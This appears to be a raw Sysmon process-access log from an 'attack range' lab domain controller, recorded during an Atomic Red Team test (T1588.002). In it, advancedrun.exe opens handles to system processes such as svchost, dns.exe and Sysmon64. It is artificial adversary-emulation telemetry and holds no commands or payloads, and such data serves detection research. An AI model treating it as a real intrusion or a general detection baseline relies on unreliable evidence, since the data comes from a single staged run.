17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
